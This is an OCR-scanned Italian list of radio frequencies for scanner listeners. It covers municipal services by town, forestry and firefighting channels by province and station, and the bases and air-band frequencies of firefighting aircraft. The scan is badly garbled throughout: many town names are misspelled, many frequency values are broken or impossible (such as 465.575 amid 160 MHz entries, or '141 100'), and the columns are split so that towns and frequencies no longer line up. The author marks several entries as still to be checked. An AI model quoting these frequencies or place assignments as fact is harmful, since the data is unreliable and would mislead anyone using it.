Ivrea 

Jesi 

Jesolo 
Lacchiarella 
Laigueglia 
Lainate 

La Spezia 
Lastra a Signa 
Lavagna 

Laveno Mombello 
Lecce 

Lecco 

Legnago 
Legnano 
Legnaro 

Leini 

Lendinara 
Lentate sul Seveso 
Lerici 

Levanto 

Lido di Camaior 
Lignano Sabbiadoro 
Limbiate 
Limena 

Limone Piemont 
Liscate 

Lissone 

Livorno 

Loano 

Lodi 

Lomazzo 

Lucca 

Lugo di Ravenna 
Luino 

Lumarzo 

Lurate Caccivio 
Magenta 
Magione 
Manerba del Garda 
Mantova 
Maranello 
Marano Ticino 
Marina di Carrar 
Marina di Massa 
Marostica 
Massa 

Massa Marittima 
Massarosa 
Mediglia 

Melzo 

Merate 
Mercogliano 
Messina 

Mestre 


MI 


466.550 
160.062,5 
466.475 
160.225 
160.225 
163.500 
165.075 


156.440 (da verificare) 


162.250 
164.650 
163.450 
164.600 
165.375 
165.025 
163.600 
156.875 
161.475 
160.037.5 
163.375 
160.125 
161.037,5 
160.625 
164.775 
160.100 
160.150 
160.062,5 
160.575 
161.425 
163.550 0 163.725 
157.525 
161.025 
160.126 
160.450 
160.050 
161.150 
163.850 171.900 
161.150 
165.350 
165.237,5 
163.300 
465.525 
165.525 
161.475 
160.062,5 
160.275 
162.600 
165.112,5 


165.475 (da verificare) 


160.775 
160.300 
163.600 
160.000 
164.800 
465.600 
168.950 
161.150 
156.912.5 
160.550 
165.275 
465.425 
171.825 
165.150 


Mestrino 
Mezzomerico 
Migliarino Pisano 
Milano 

Mirabello 
Miradolo Terme 
Mirandola 
Misano Adriatic 
Modena 
Mogliano March 
Moncalieri 
Mondolfo 
Montagnana 
Montano Lucino 
Monte San Vito 
Montecatini Tarme 
Montecosaro 
Montefelcino 
Montegrotto Terme 
Montemerano 
Montemarciano 
Monza 

Muggia 

Muggiò 

Napoli 


Nerviano 
Nichelino 

Nizza Monferrat 
Noale 

Nove Milanese 
Novara 

Novi Ligure 
Numana 
Oleggio 
Orbassano 

Orta San Giulio 
Ortonovo 
Orvieto 

Osimo 

Oslo Sopra 

Oslo Sotto 
Ostra 

Ovada 

Paderno Dugnan 
Padova 

Paesana 
Palermo 
Pantigliate 
Parma 

Paullo 

Pavia 

Peccetto Torines 
Pergola 

Pero 

Perugia 

Pesaro 

Pescara 
Peschiera Borrorneo 
Peschiera del Garda 
Pessano con Bornago 
Piacenza 


VR 
MI 


165.175 

160.300 

162.437,5 

157.300 157.325 157.400 158.900 160.175 160. 225 160.400 
163.500 

156.525 

160.300 

165.300 

163.350 164.925 
163.275 

160.350 

164.750 

160.287.5 

160.062,5 

165.275 

170.400 

160.662,5 o 160.762,5 
160.025 

164.600 

163.275 

465.950 

165.275 

162.200 

160.075 

165.000 165.200 165.350 165.450 165.800 165.950 
165.975 167.200 167.225 167.275 
165.075 

161.587,5 

162.162,5 

165.200 

161.687,5 

173.450 

160.200 

165.187,5 

160.300 

160.925 

168.450 

164.650 

160.025 

163.600 

165.200 

165.200 

164.825 

162.150 

161.925 

164.950 

160.612,5 

165.300 171.900 
160.325 

161.900 

160.475 

165.000 

160.787,5 

160.762,5 

441.050 (da verificare) 
161.625 

162.375 

163.300 163.350 (da verificare) 
160.475 

160.225 

159.937,5 (da verificare) 
160.625 


Pienezza 
Piazzale sul Brenta 
Pietre Ligure 
Pietrasante 

Pieve di Cadore 
Pieve di Soligo 
Pieve Emanuele 
Pieve Ligure 
Pievepelago 
Pinerolo 
Pioltello 

Piove di Sacco 
Pisa 

Pistoia 
Pomigliano d’ Arco 
Pontasserchio 
Ponte San Nicolò 
Ponte San Pietro 
Pordenone 

Porto Recanati 
Porto Sant'Elpidio 
Portofino 
Portovenere 
Potenza Picena 
Pove del Grappa 
Pralungo 

Prato 

Pregnana Milanese 
Quarona 
Quiliano 
Racconigi 
Rapallo 

Ravenna 
Recaneti 

Recco 

Reggio Catabria 
Reggio Emilia 
Rho 

Riccione 

Rimini 
Riomaggiore 
Rivatta di Torino 
Rivoli 

Rivolta d’ Adda 
Roma 


Rosignano Marittimo 


Rosignano Sotvay 
Rossano Veneto 
Rovellasca 
Rovigo 
Rozzano 
Rubano 

Russi 

Ruta 

Saint Vincent 
Salerno 

Saltare 

Saluzzo 


San Bartolomeo al Mare 
San Benigno Canavese 


San Carlo 


160.575 
160.125 
162.050 
465.575 
156.475 
165. 000 
444.225 
164.925 
164.600 
163.412,5 
168.450 
164.675 
162.175 
162.100 
162.375 
162.437,5 
156.750 
161.275 
468.862,5 
163.525 
163.400 
162.375 
162.450 
163.387.5 
157.725 
160.512.5 
161.500 
160.575 
151.637.5 
160.025 
440.475 
163.450 
160.025 
160.575 
161.925 
163.325 
466.700 
165.025 
165.275 
163.300 
160.075 
165.350 
160.800 
160.475 
166.600 
445.800 
173.875 
173.875 
163.450 
165.225 
465.200 
163.425 
164.800 
160.375 
164.925 
163.525 
164.750 
164.875 
162.787,5 
160.100 
160.550 
163.500 


(da verificare) 


164.825 


167.450 167.476 167.500 167.525 
466.800 (entrambe da verficare) 


164.775 


San Cataldo 

San Costanzo 

San Donà di Piave 

San Donato MiLanese 
San Giorgio del Sannio 
San Giovanni in Fiore 
San Giuliano Milanese 
San Giuliano Terme 
San Lazzaro di Savena 
San Maurizio Canavese 
San Mauro Torinese 
San Paolo di Jesi 

San Pietro di Feletto 
San Remo 

San Severino Marche 
San Vito dei Normanni 
Sandrigo 

Santa Margherita Ligure 
Sant'Agostino 

Santena 

Santo Stefano di Magra 
Sarnico 

Saronno 

Sarzana 

Sassari 

Sassuolo 

Savigliano 

Savona 

Scandiano 

Scandicci 

Selvazzano Dentro 
Senago 

Senigallia 

Seregno 

Sanate 

Senno 

Sesto San Giovanni 
Sestri Levante 

Settala 

Settimo Milanes 
Settimo Torinese 
Siena 

Siracusa 

Sirmione 

Sirolo 

Sotaro 

Solesino 

Somaglia 

Sommariva Bosco 
Sondrio 

Sovico 

Spello 

Spotomo 

Staffolo 

Stella 

Susa 

Taggia 

Torino 


Torre Annunziat 
Trapani 
Trento 


MI 


NA 


163.025 
162.312,5 
164.876 
162.225 
162.375 
162.375 
165.050 
162.437.5 
160.200 
162.262,5 
160.850 
166.112,5 
160.125 
163.450 
161.500 
163.400 
165.150 
164.925 
163.500 
467.100 
162.325 
160.012.5 
160.450 
162.375 
465.125 
160.150 
445.600 
162.075 
161.975 
161.725 
163.450 
164.750 
160.250 
169.875 
163.425 
163.275 
160.325 
162.362,5 
160.412,5 
160.075 
160.812.5 
163.600 
163.575 
168.587,5 
162.137.5 


159.987,5 (da verificare) 
156.400 160.275 (entrambe de verificare) 


160.412,5 
163.287,5 

156.400 

160.325 

160.025 

162.462,5 164.725 
160.762,5 

161.150 

445.825 

160.150 


467.225 467.325 467.350 467.950 
468.025 468.125 468.175 468.250 


162.375 
163.600 
161.700 181.750 


Treviglio 

Treviso 

Trezzano sul Naviglio 
Trezzo sull'Adda 
Trieste 

Urbino 

Vado Ligure 
Valdengo 

Valenza 
Valfabbrica 
Valguarnera 
Vallecrosia 
Valtournanche 
Varazze 

Varese 

Vasto 

Vecchiano 
Venaria Reale 
Venezia 
Ventimiglia 
Verbania 

Vercelli 

Verona 

Vezzano Ligure 
Viareggio 
Vicenza 

Vigevano 
Vigliano Biellese 
Vignate 

Vignola 

Vigonza 
Villafranca Padovana 
Vimodrone 
Vinovo 

Vizzolo Predabissi 
Voghera 

Volvera 

Zibido San Giacomo 


165.400 
457.025 
160.050 
160.475 
162.200 
160.200 
162.462,5 
162. 037.5 
160.037,5 
162.475 
162.450 
160.225 
160.762,5 
162.050 
161.775 
163.400 
162.437,5 
160.550 o 164.950 
164.776 165.075 165.150 165.525 173.650 
163.600 
157.637,5 (da verificare) 
163.275 
164.800 
160.175 
468.300 
165.000 
160.600 
156.925 
160.625 
160.350 
164.775 
165.175 
160.475 
468.337,5 
160.075 
160.150 
162.225 
160.075 


ANTINCENDI BOSCHIVI - FORESTALE 


VIGILANZA PARCHI E FORESTE 


BANDA 172.5 - 174 MHz (servizi compresi nella gamma civile VHF) 


LINK MASTER UHF - LIMITI DI BANDA 436- 440 445- 449 MHz 


(compresi nella gamma civile UHF) 


DISLOCAZIONE MEZZI AEREI ANTINCENDI 


AEROPORTI AEROMOBILI 

Alghero 1 Aereo CL 215 

Bari 1 Aereo CL 415 

Cagliari 1 Elicottero CL 215 

Catania 1 Elicottero AB 212 

Cecina 1 Elicottero NH 500 

Ciampino 3 Aerei 1 CL 215 2 CL 415 
Genova 1 Aereo CL 215 

Grottaglie 1 Elicottero AB 212 

Lamezia Terme 1 Aereo CL 415 1 Elicottero CH 47 
Luni 1 Elicottero AB 212 

Palermo 1 Aereo CL 415 

Pescara 1 Elicottero AB 412 

Pisa 1 Aereo G222 

Pontecagnano 2 Elicotteri 1 AB 212 1 NH 500 
Reggio Calabria 1 Aereo CL 415 

Urbe 2 Elicotteri 1 AB 412 1 NH 500 
Viterbo 3 Elicotteri 2 CH 47 1AB 412 


Frequenze in uso ai mezzi aerei antincendi 


131.550 Nazionale 
141 100 Nazionale 
122.150 Regione Liguria 


DISTACCAMENTI STAZIONI 


PER OGNI PROVINCIA VENGONO RIPORTATI I DISTACCAMENTI E LE STAZIONI 
DIPENDENTI 


POTREBBE VERIFICARSI L’UTILIZZO DI FREQUENZE DIVERSE DA QUELLE ASSEGNATE A 
LIVELLO 

PROVINCIALE INSERITE IN QUESTA TABELLA NAZIONALE VERRA’ PERTANTO RIPORTATO AL 
TERMINE L’INTERO ELENCO DELLE FREQUENZE UTILIZZATE PER POTER EFFETTUARE UN 
EVENTUALE VERIFICA NEGLI ASCOLTI A LIVELLO DI OGNI SINGOLA PROVINCIA DI 
APPARTENZA 


PROVINCIE E LOCALITA' FREQUENZE 
Agrigento 172.925 173.025 
Burgio 

Ribera 

Sambuca di Sicilia 

San Giovanni Gemini (località Camrnarata) 


Alessandria 172.950 173.050 
Acqui Terme 

Cabella Ligure 

Ovada 

San Sebastiano Curone 

Stazzano 


Ancona 172.925 172.975 
Arcevia 

Fabriano 

Genga 

Sassoferrato 


Aosta 162.025 163.750 
Aymavilles (località Frazione Cheriette) 
Antey — Saint Andrè (località Champagne) 
Arvier 

Brusson 

Chatillon 

Etroubles 

Gaby 

Morgex 

Nus 

Pontboset 

Pont — Saint Martin 

Prè—Saint Didier 

Saint Christophe (località Grande Charriere) 
Valpelline (località Capoluogo) 

Verres 

Villeneuve 


Arezzo 172.925 173.025 
Montecchio 

Piave Santo Stefano 

Poppi (Località Camaldoli) 

Pratovecchio 

Sansepolcro 


173.037,5 173.075 


166.050 166.350 172.975 173.075 


173.575 


Ascoli Piceno 172.925 172.937,5 172.987,5 173.025 173.062,5 


Acquasanta Terme 

Amendola 

Arquata del Tronto 

Castignano 

Comunanza 

Fermo 

Montefortino (località Madonna del Fonte) 
Montegallo 

Montemonaco 


Asti 172.987,5 
Bubbio 


Avellino 172.975 173.075 


Torre le Nocelle 


Bari 172.900<>172.937,5<>173.012,5 (simulcast) 172.975 173.075 
Acquaviva delle Fonti 

Alberobello 

Altamura 

Cassano delle Murge 

Corato 

Gioia del Colle 

Gravina in Puglia 

Noci 

Spinazzola 


Belluno 172.925 173.025 172.800 (regionale) 
Agordo 

Alleghe 

Auronzo di Cadore 

Barca di Cadore 

Canale d'Agordo 

Comelico Superiore 

Cortina d’ Ampezzo 

Feltre 

Fanzaso 

Fregona 

Livinallongo del Col di Lana 
Longarone 

Lazzo di Cadore 

Mei 

Puos d'Alpago 

Santa Stefano di Cadore 
Sappada 

Sadico 


Benevento 172.900 173.000 
Ceppaloni 


Bergamo 172.900 173.000 173.520 173.532,5 
Caprina Bergamasco 
Clusone 

Curno 

Gromo 

Piazza Brembana 
Sernico 

Spinone al Lago 
Trascore Balneario 
Vertova 

Villa d'Almè 
Vilminore di Scalve 


Biella 172.925 172.950 173.025 

Trivero 

Bologna 165.925 166.350 172.975 173.075 
Camugnano 

Costei del Rio 


Costei di Casio 
Castiglione dei Pepoli 
Gaggio Montano 
Lizzano in Belvedere 
Monghidoro 
Monterenzio 
Monzuno 


Porretta Terme 

San Benedetto Val di Sambra 
Savigno 

Vergato 


Bolzano 162.425 163.475 172.900 173.000 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Brescia 172.937.5 173. 037.5 173.520 
Bagolino (località Valle Sabbia> 
Sarno 

Bovegno (località Predando) 
Breno 

Capo di Ponte 

Capavalle 

Cedagolo 

Concesio 

Corteno Golgi 

Darfo — Boario Terme 
Edolo 

Gardone Val Trompia 
Gargnano 

Gavardo 

Idro 

Iseo 

Pisogne 

Ponte di Legno 

Sabbio Chiese 

Salò 

Tremosine 

Vestone 

Vezza d'Oglio 


Brindisi 172.937,5<>1 73.000 (simulcast) 172.950 173.050 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Cagliari 172.962,5 173.025 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Caltanissetta 172.937,5 173.037,5 
Mazzarino 

Mussomeli (località Contrada Polizzello) 

Niscemi 

Sutera 


Campobasso 172.925<> 173.025<>173.087,5 (simulcast) 
Bojano 

Casacalenda (località Contrada Monte) 
Civitacampomarano 

Montagano 

Montefalcone nel Sannio 

Petacciato (località Petacciato Scalo) 
Riccia 

San Giuliano del Sannio 

SantElia a Pianisi 

Sepino 

Torella del Sannio 

Trivento 


Caserta 172.962,5 173.012,5 173.062,5 
Caiazzo 
Calvi Risorta 


Castel Volturno 

Letino 

Piedimonte Matese 

Pietramelara 

Prata Sannita 

Roccamonfina 

San Gregorio Matese 

Sessa Aurunca (località Adrianea) 
Vairano Petenora 


Catania 172.975 173.050 173.075 
Adrano 

Bronte 

Giarre 

Linguaglossa 

Nicolosi 

Randazzo 

Vizzini 


Catanzaro 172.937.5 173.037,5 173. 125 
Caraffa di Catanzaro 
Cardinale (località Novalba) 
Davoli 

Decollatura 

Girifalco 

Lamezia Terme 

Maida 

Nocera Tirinese 

Petrizzi 

San Vito sullo Ionio 

Santa Caterina dello lonio 
Savelli 

Serrastretta 

Sersale 

Tiriolo 

Zagarise 


Chieti 172.900 173.000 
Casoli 

Castglione Messer Marino 
Gissi 

Fara San Martino 
Guardiagrele 

Lanciano 

Montazzoli 

Palena 

Palmoli 

Palombaro 

Pretoro 

Rosello 

Santa Maria Imbaro 
Torrebruna 

Torricella Peligna 

Vasto 

Villa Santa Maria 


Como 172.795 172.950 172.975 173.050 
Appiano Gentile 


Asso 
Carlazzo 
Gera Lario 


Menaggio (Frazione Loveno) 
Pellio tntelvi (località Selva) 
Ponte Chiasso 


Cosenza 172.962,5 173.062,5 173.100 
Acri 

Aprigliano 
Bocchigliero 
Campana 
Castrovillari 
Cerchiara di Calabria 
Cerzeto 

Civita 

Corigliano Calabro 
Cropalati 

Dipignano 

Domanico 

Fagnano Castello 
Fuscaldo 

Grimaldi 

Grisolia 

Laino Borgo 
Longobardi 
Longobucco 

Lungro 

Mendicino 

Montalto Uffugo 
Morano Calabra 
Mormanno 

Oriolo 

Orsomarso 

Paola 

Rogliano 

Rose 

Rossano 

Rota Greca 

San Demetrio Corone 
San Donato di Ninea 
San Fili 

San Giovanni in Fiore 
San Marco Argentano 
San Pietro in Guarano (Frazione Redipiano) 
San Sosti 

Sant'Agata di Esaro 
Saracena 

Scigliano 

Spezzano della Sua 
Tortona 

Trebisacce 

Verbicaro 


Cremona 172962,5 173.012,5 173062,5 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Crotone 172.937,5 173.037,5 
Cotronei 
San Nicola dell'Alto 


Cuneo 172.925 172.937.5 173.025 
Alba 

Barge 

Borgo San Dalmazzo 


Caraglio 

Ceva 

Chiusa di Pesio 
Cortemitia 
Demonte 
Dronero 
Garessio 
Mondovì 
Ormea 

Saluzzo 
Sampeyre 
Villanova Mondovi 


Enna 163.750 165.575 172.9125 173.000 173.012,5 
Nicosia (localilà Contrada Magnana) 

Piazza Armerina 

Troina 


Ferrara 166050 166.075 172.900 173.000 
Comacchio (località Volano) 
Mesola (località Bosco Mesola) 


Firenze 172.900 172.912,5 173.000<>173.750 (simulcast) 173.012.5 
Barberino di Mugello 

Borgo San Lorenzo 

Dicamana 

Empoli 

Firenzuola (località Covigliaio) 

Greve in Chianti 

Marradi 

Montaione 

Palazzuolo sul Senio (località Palazzuolo dei Capitani) 
Reggello 

Rufina 

San Casciano in Val di Pesa 

San Pietro a Sieve (località Fortuna) 

Sesto Fiorentino 

Tevernelle Val di Pesa 


Foggia 172.912.5<>172.950 (simulcast) 173.050 
Accadia 

Ascoli Satriano 

Biccari 

Cagnano Varano 

Deliceto 

Lesina 

Manfredonia 

Margherita di Savoia 

Mattinata 

Monte Sant’ Angelo (località Foresta Umbra) 
Orsora di Puglia 

Roseto Valfortore 

San Giovanni Rotondo 

Sennicandro Garganico 

Serracapriola 

Vico dei Gargano 

Vieste (località Mandrione) 

Volturara Appula 


Forlì 165.925 166.250 172.962,5 172.975<>173.062,5 (simulcast) 
Bagno di Romagna (località San Pietro in Bagno) 
Civitella di Romagna 


Mercato Saraceno 

Portico di Romagna (località Acquacheta) 
Predappio 

Premilcuore 

Rocca San Casciano 

Santa Sofia (località Campigna) 

Sarsina 

Sogliano al Rubicone 

Tredozio 

Verghereto 


Frosinone 172.937,5 173.037,5 
Alatri 

Anagli 

Atina 

Cassino 

Castro dei Volsci 

Ceccano 

Ceprano 

Filettino 

Fiuggi 

Guarcino 

Picinisco 

Pontecorvo 

San Donato Val di Comino 
Sora 

Vallerotonda 


Genova 172.775 172.925 173.050 (regionale) 173.575 (regionale) (da 
verif. ) 

Arenzano 

Borzonasca 

Busalla (località Sorrisola) 
Casarza Ligure 

Cicagna 

Lavagna 

Masone 

Maconesi (località Gattorna) 
Montoggio (località Taverna) 
Rezzoaglio 

Rovegno 

Santo Stefano dAveto 


Gorizia 172.962,5 173.062,5 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Grosseto 172.787.5 172.912,5 173.012.5 173.500 173.575 
Castei del Piano 
Castell'Azzara 
Castiglione della Pescaia 
Civitella Paganico 
Manciano 

Massa Marittima 

Monte Argentario 
Monterotondo Marittimo 
Montieri 

Orbetello 

Roccastrada 

Santa Fiora 

Scansano 


Imperia 172.950 172.975 173.050 (regionale) 173.575 (regionale) 
(da verif.) 
Badalucco 
Baiardo 

Pieve di Teco 
Pigna 

Pontedassio 
Rocchetta Nervina 
San Remo 

Triora 
Ventimiglia 


Isernia 172.987,5 
Agnone 

Carovilli 

Carpinone 

Colli a Volturno 
Porti del Sannio 
Frosolone 
Monteroduni 
Pescopennataro 
Pizzone 
Roccamandolfi i 
San Pietro Avellana 
Venafro 


La Spezia 172.750 172.950 173.050 (regionale) 173.575 (regionale) 
(da verif.) 

Borghetto Vara 

Brugnato 

Carrodano di Mattarana 

Pollo 

Levanto 

Sarzana 

Sesta Godano 

Varese Ligure 


Latina 172.900 172.962,5 173.000 
Cori (località Contrada Chiusa) 

Fondi 

Itri 

Priverno 

Sabaudia 

Sezze 

Spigno Saturnia 

Terracina 


Lecce 172.975 173.075 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Lecco 172.795 172.950 172.975 173.050 

Barzio 

Dervio 

Margno 

Livorno 162.650 165.250 172.962,5<>173.050 (simulcast) 173.062,5 
Cecina (località Cecinella Marina) 172.762,5<>173.537,5 (simulcast) (Isole Elba — Capraia) 


Marciena Marina 
Portoferraio (località Antiche Saline) 


Lodi 172.925 173.025 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Lucca 164.812,5 172.787,5 172.912,5 173.012.5 173.125 
Barga 

Borgo a Mozzano 

Camporgiano 

Capannori (località Vorno) 

Castelnuovo di Garfagnana (località Orto Murato) 
Piazza al Serchio 

Pietrasanta 

Pieve Santo Stefano 

Stazzema (località Molino Gìusti) 

Viareggio (località Pontemazzori) 


L’Aquila 172.912,5 173.012,5 
Alfedena 
Barisciano 

Barrea 

Bisegna 

Cansano 
Cepestrano 
Capistrello 
Cappadocia 
Carsoti 

Castel del Monte 
Castel di Sangro 
Celano 

Civitella Roveto 
Fontecchio 

Gioia dei Marsi 
Lecce nei Marsi 
Lucoli 

Magliano dè Marsi (località Pascolano) 
Montereale 

Opi 

Pacentro 

Pereto 
Pescocostanzo 
Pettorano sul Gizio 
Pizzoli 

Raiano 

Rocca di Mezzo 
Roccaraso 

Sante Marie 
Scanno 

Scoppito 

Secinaro 
Tornimparte (localìtà Villagrande) 
Trasacco 
Villavallelonga 


Macerata 172.900 172.937.5 172.962,5 173.000 
Apiro 

Bolognola 

Caldarola 

Camerino 
Castelsantangelo sul Nera 
Cingoli 

Civitanova Marche 
Fiastra 

Fiuminata 

Matelica 

Pieve Torina 


Recanati 

San Severino Marche 
Sarmano 

Serravalle di Chienti 
Ussita 

Visso 


Mantova 172.987,5 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Massa 162.825 172.975 173.075 173.562,5 
Bagnone (località Grottò) 

Comano 

Fivizzano 

Pontremoli 

Zeri (località Coloretta) 


Matera 172.900 173.000 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Messina 172.925 (terra ferma + Isole Lipari) 173.025 173.050 
Barcellona Pozzo di Gotto 

Capizzi 

Caronia 

Floresta 

Francavilla di Sicilia 

Lipari 

Patti 

Rometta 

San Fratello 

Santa Teresa di Riva 

SantAngelo di Brolo (località Naso) 
Tortorici 


Milano 172.925 173.025 
Carate Brianza 


Modena 166.050 172.950 173.050 
Fanano 

Fiumalbo 

Lama Mocogno 
Montefiorino 
Montese 

Pavullo nel Frignano 
Pievepelago 
Riolunato 
Serramazzoni 
Sestola 

Zocca 


Napoli 172.937.5 173.037.5 
Casamicciola Terme 

Castellammare di Stabia 

Ottaviano 

Palma Campania 

Pozzuoli (località Monterusciello) 

Roccarainola 

Sorrento 

Torre del Greco 


Novara 172.937.5 172.962,5 173.062.5 
Gozzano 


Nuoro 172.925 172.975 173.025 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Oristano 172.987,5 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Padova 172.950 172.975 173.075 172.800 (regionale) 
Monselice 


Palermo 172.950 (terra ferma + Isola Ustica) 172.975 173.075 
Bisacquino 

Caccano (località Contrada Calabrone) 
Carini 

Castalbuono 

Castronovo di Sicilia 

Collesano 

Corlaona (località Ficuzza) 

Lascari (località Contrada Sante Maria) 
Monreale 

Montemaggiora Belsito 

Patralia Sottana 

Piana degli Albanesi 

Polizzi Generosa 


Parma 165.975 166.350 172.960 172.962,5 173.000 
Bedonia 

Berceto 

Borgo Val di Taro 
Calastano 

Comiglio (località Lagdei) 
Langhirano 

Monchio delle Corti 
Neviano dagli Arduini 
Pallagnno Parmense 
Solignano 


Pavia 172.967,5 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Perugia (località Ponte Felcino) 160.675 172.950 173.050 
Assisi (località Monte Subasio) 
Cascia (località Padule) 
Cerreto di Spoleto 

Città dalla Pieve 

Città di Castello (località Bocca Serriola) 
Foligno 

Gualdo Cattaneo 

Gualdo Tadino 

Gubbio 

Magione 

Marsciano 

Monteleone di Spoleto 

Nocera Umbra 

Norcia 

Passignano sul Trasimeno 
Pietralunga (località Candeleto) 
Preci 

Sant'Anatolia di Narco 
Scheggia e Pascelupo 

Sellano 

Spoleto 


Todi 

Travi 
Umbertide 
Valfabbrica 


Pesaro 

Cagli 

Cantiano 

Carpegna 

Fano 

Fossombrone 
Macerata Feltria 
Mercatello sul Metauro 
Novafeltria 
Pennabilli 

Pergola 

Piobbico 

SantAgata Feltria 
Sant'Angelo in Vado 
Serra Sant'Abbondio 
Urbino 


Pescara 

Caramanico Terme 
Carpineto della Nora 
Collecorvino 
Farindola 
Lettomanoppello 
Montebello di Bertona 
Penne 

Popoli (località Impianezza) 
Roccamorice 
SantEufemia a Maialla 
Torre dè Passeri 


Piacenza 

Bettola 

Bobbio Piacentino 
Castell’ Arquato 
Ferriere 

Ottone 

Pianello Val Tidone 
Travo 


Pisa 

Calci 

Montecatini Val di Cecina 
Palaia 

Pomarance 

Pontedera 

Santa Croce sull’ Arno 
Volterra 


Pistoia 

Abetone (località Pian degli Ontani) 
Cutigliano 

Monsummano Terme 

Pescia 

Piteglio 

Sambuca Pistoiese (località Acquerino) 
San Marcello Pistoiese 


172.912,5 173.012,5 


172.900<>173.000 (simulcast) 172.975 173.075 


165.925 166.050 166.075 172.962, 5 173.062,5 


172.937,5 173.037,5 173.512.5<> 173.550 (simulcast) 


172.987,5<>173.050 (simulcast) 172.800 


Pordenone 


172.975 173.075 


DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Potenza 

Lagonegro 

Marsicovetere (località Contrada Galdo) 
Rionero in Vulture 

Tolve 


Prato 
Vernio 


Ragusa 

Chiaramonte Gulfi 

Mistretta 

Vittoria (località Contrada Gaspanella) 


Ravenna 
Brisighella 
Casale Valsenio 
Cervia 


Reggio Calabria 

Giffone 

Gioia Tauro (località Contrada Cicerna) 
Locri 

Mammola 

Oppido Mamertina 

Platì 

San Giorgio Morgeto 

San Luca 


172.937.5 173.037,5 


172.900 173.000 173.582,5 173.750 


172.900 173.000 


166.050 172.937,5 173.037.5 


172.750<>172.800 (simulcast) 172.900 173.000 


Santo Stefano Aspromonte (località Gambarie) 


Scilla 
Staiti 
Stilo 


Reggio Emilia 

Busana 

Carpineti 

Casina 

Castelnuovo né Monti 

Ligonchio 

Marmiroto (località Bosco Fontana) 
Ramiseto 

Viano 

Villa Minozzo 


Rieti 
Antrodoco 


Rimini 
Misano Adriatico 


Roma 

Arsoli 

Bracciano 
Rignano Flaminio 
Subiaco 

Tivoli 

Velletri 

Vicovaro 


165.925 168.250 172.925 173.025 173.525 


172.987,5 


172.962,5 173.062,5 


172.962,5 173.062.5 


Rovigo 
Adria 


Salerno 
Padula 


172.750 172.925 173.025 172.800 (regionale) 


172.912.5 172.950 173.012,5 


Pontecagnano Faiano (località SantAntonio) 


Sassari 


172.950 173.050 


DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Savona 

Albenga (località Leca) 
Andora 

Cairo Montenotte 
Calice Ligure 
Calizzano 

Loano 

Sassello 

Spotorno 


Siena 

Asciano 
Castiglione d’Orcia 
Colle di Val d’Elsa 
Gaiole in Chianti 
Montalcino 
Monticiano 
Piancastagnaio 
Racida in Chianti 
San Gimignano 
Sarteano 
Sinalunga 


Siracusa 
Buccheri 
Noto 
Sortino 


Sondrio 

Ardenno 

Barbenno di Valtellina 
Bormio 
Campodolcino 
Chiavenna 

Chiese in Valmalanco 
Delebio 

Grosotto 

Morbegno 

Ponte In Valtellina 
Sondalo 

Teglio 

Tirano 

Valdidentro 


Taranto 


172.780 172.800<>173.000 (simulcast) 173.050 (regionale) 
173.575 (regionale) (da verificare) 


172.750<>173.537,5 (simulcast) 172.975 173.075 


172.950 173.050 


172.975 173.075 173.532,5 


172.925 173.025 173.050 


DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Teramo 

Atri 

Campli 

Castelli 

Civitella del Tronto 


172.950<>173.012,5<>173.050 (simulcast) 


Cortino 

Crognaleto (Località Nerito) 

Pietracamela 

Rocca Santa Maria 

Torricella Sicura 

Tossicia (località Contrada Piane San Liberatore) 


Terni 172.900 173.000 
Acquasparta 

Allerona 

Amelia 

Arrone 

Avigliano Umbro 

Calvi dell’Umbria 

Castei Viscardo 

Ferentillo 

Ficulle 

Lugnano in Teverina 

Nami 

Orvieto (località Polleggione Morrano) 
San Venanzo 

Stroncone 


Torino 172.900 172.925 173.000 
Almese 

Bardonecchia 

Beinasco (località Torino Fornaci) 
Bussoleno 

Ceres 

Chivasso 

Fenestrelle 

Giaveno 

Lanzo torinese 

Locana 

Montalto Dora 

Noasca 

Oulx 

Pinasca 

Pinerolo 

Pont Canavese 

Pragelato (località Frazione Ruà) 
Ronco Canavese 

Torre Pellice 

Vico Canavese 


Trapani 172.950 (terra ferma + Isola Favignana) 173.050 Erice 
Trento 172.962,5 173.062,5 

Mione 

Treviso 172.912,5 173.012.5 173.075 172. 800 (regionale) 


Borso del Grappa 
Cavaso del Tomba 
Creapano del Grappa 
Cornuda 
Valdobbiadene 
Vittorio Veneto 
Volpago del Mantello 


Trieste 172.962,5 173.062.5 
DISTACCAMENTI E STAZIONI NON DISPONIBILI 


Udine 172.900 173.000 173.567,5 (verificare) 
Malborghetto Valbruna (località Ugovizza) 
Tarvisio (località Camporosso) 


Varese 172.795 172.912,5 173.012,5 
Arcisate 

Cunardo 

Lavano Mombello 

Luino 

Tradate 

Vergiate 


Venezia (località Mestre) 172.937,5 173.037,5 173.125 (verificare) 172.800 (regionale) 
Bibione (località San Michele al Tagliamento) 

Chioggia (località Cavanella d’ Adige) 

Portogruaro 


Verbania (località Pallanza) 172.937,5 172.962,5 173.062,5 
Baceno 

Beura Cardezza (località Domo Due) 
Cannobio 

Ceppo Morelli 

Domodossola 

Gignese 

Omegna 

Piedimulera 

Santa Maria Maggiore 

Varzo 


Vercelli 172.925 172.950 173.025 
Gattinara 

Scopa (Frazione Valletto) 

Varallo 


Verona 172.912,5 173.012,5 172.800 (regionale) 
Brenzone (località Magugnano) 
Caprino Veronese 

Cavaian Veronese 

Fumane 

Grezzana 

Montecchia di Crosara 

Roverè Veronese 

San Zeno di Montagna 
SantAnna d’Alf aedo 

Tregnano 


ViboValentia 172.937,5 173.037,5 
Arena 

Mongiana 

Serra San Bruno 

Soriano Calabro 

Vallelonga 


Vicenza 172.950 173.050 172.800 (regionale) 
Arzignano 

Asiago 

Bassano del Grappa 

Conco 

Enego 

Gallio 

Lonigo 

Lusiana 


Roana 
Rotzo 
San Nazario 
Schio 


Viterbo 
Acquapendente 
Bagnoregio 
Bolsena 

Civita Castellana 
Montefiascone 
